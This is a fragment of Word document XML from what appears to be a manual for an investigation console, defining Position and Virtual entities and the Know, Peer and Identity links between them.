                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00036C4C" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036C4C" w:rsidRDefault="00036C4C" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="630" w:dyaOrig="900">
                <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:27.75pt;height:44.25pt" o:ole="">
                  <v:imagedata r:id="rId43" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1446455242" r:id="rId44"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036C4C" w:rsidRDefault="00036C4C" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00671455" w:rsidRPr="00671455" w:rsidRDefault="00671455" w:rsidP="00671455">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Position</w:t>
            </w:r>
            <w:r w:rsidRPr="00671455">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Entity</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036C4C" w:rsidRDefault="009E2BA0" w:rsidP="00671455">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">This type of </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity represents a geographic location involved in the ongoing operation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009E2BA0" w:rsidRPr="00671455" w:rsidRDefault="00373E4F" w:rsidP="00373E4F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This entity can be specified by address or by coordinates (latitude and longitude).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C24B7" w:rsidRPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="005701FD" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="005701FD" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="005701FD" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00036C4C" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036C4C" w:rsidRDefault="00036C4C" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="600" w:dyaOrig="870">
                <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:28.5pt;height:43.5pt" o:ole="">
                  <v:imagedata r:id="rId45" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1446455243" r:id="rId46"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036C4C" w:rsidRDefault="00036C4C" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00671455" w:rsidRPr="00671455" w:rsidRDefault="00671455" w:rsidP="00671455">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Virtual</w:t>
            </w:r>
            <w:r w:rsidRPr="00671455">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Entity</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00373E4F" w:rsidRDefault="00373E4F" w:rsidP="00373E4F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">This type of </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ntity represents a </w:t>
            </w:r>
            <w:r w:rsidR="000B2165">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">collection of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>virtual resource</w:t>
            </w:r>
            <w:r w:rsidR="000B2165">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> involved in the ongoing operation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036C4C" w:rsidRPr="00671455" w:rsidRDefault="00373E4F" w:rsidP="000B2165">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">This entity </w:t>
            </w:r>
            <w:r w:rsidR="000B2165">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>must be completed providing a list of URLs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BD4038" w:rsidRDefault="00BD4038" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B4177" w:rsidRDefault="006B4177" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0074529F" w:rsidRPr="006B4177" w:rsidRDefault="00816A09" w:rsidP="0074529F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B4177">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entities can be connected together using Links. There’re 3 different types of Links: Know, Peer and Identity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00E26F92" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1504"/>
        <w:gridCol w:w="1462"/>
        <w:gridCol w:w="6652"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidTr="00E17308">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05" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="95B3D7" w:themeColor="accent1" w:themeTint="99"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00E26F92" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Status </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00E26F92" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00E26F92" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidTr="002E5105">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505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00BE295A" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="870" w:dyaOrig="375">
                <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:43.5pt;height:18.75pt" o:ole="">
                  <v:imagedata r:id="rId47" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1029" DrawAspect="Content" ObjectID="_1446455244" r:id="rId48"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00A3639F" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Know</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00C75F9B" w:rsidP="00C75F9B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">It represents a </w:t>
            </w:r>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:i/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>know</w:t>
            </w:r>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> type relationship. Two Entities have a Know Link when at least one has the other in it’s address-book</w:t>
            </w:r>
            <w:r w:rsidR="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (for example)</w:t>
            </w:r>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidTr="002E5105">
        <w:trPr>
          <w:trHeight w:val="1417"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00BE295A" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="885" w:dyaOrig="405">
                <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:44.25pt;height:20.25pt" o:ole="">
                  <v:imagedata r:id="rId49" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1030" DrawAspect="Content" ObjectID="_1446455245" r:id="rId50"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00A3639F" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Peer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00C75F9B" w:rsidP="00702DAE">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">It indicates that there was a </w:t>
            </w:r>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:i/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>contact</w:t>
            </w:r>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> between the two entities. Two Entities have a Peer Link when they spoke</w:t>
            </w:r>
            <w:r w:rsidR="00702DAE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>wrote</w:t>
            </w:r>
            <w:r w:rsidR="00702DAE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>together.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidTr="002E5105">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505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00BE295A" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="810" w:dyaOrig="405">
                <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:40.5pt;height:20.25pt" o:ole="">
                  <v:imagedata r:id="rId51" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1031" DrawAspect="Content" ObjectID="_1446455246" r:id="rId52"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="00A3639F" w:rsidP="00E17308">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B4177">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E26F92" w:rsidRPr="006B4177" w:rsidRDefault="002E5105" w:rsidP="002E5105">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It represents a suggestion of an </w:t>
            </w:r>
            <w:r w:rsidRPr="002E5105">
              <w:rPr>
                <w:i/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>identity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> relationship between two Entities that represent people. </w:t>
            </w:r>
            <w:r w:rsidRPr="00315D99">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This type of Link is automatically created by the Console when the two Entities share at least one identification (e.g. phone number).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002E5105" w:rsidRDefault="002E5105" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
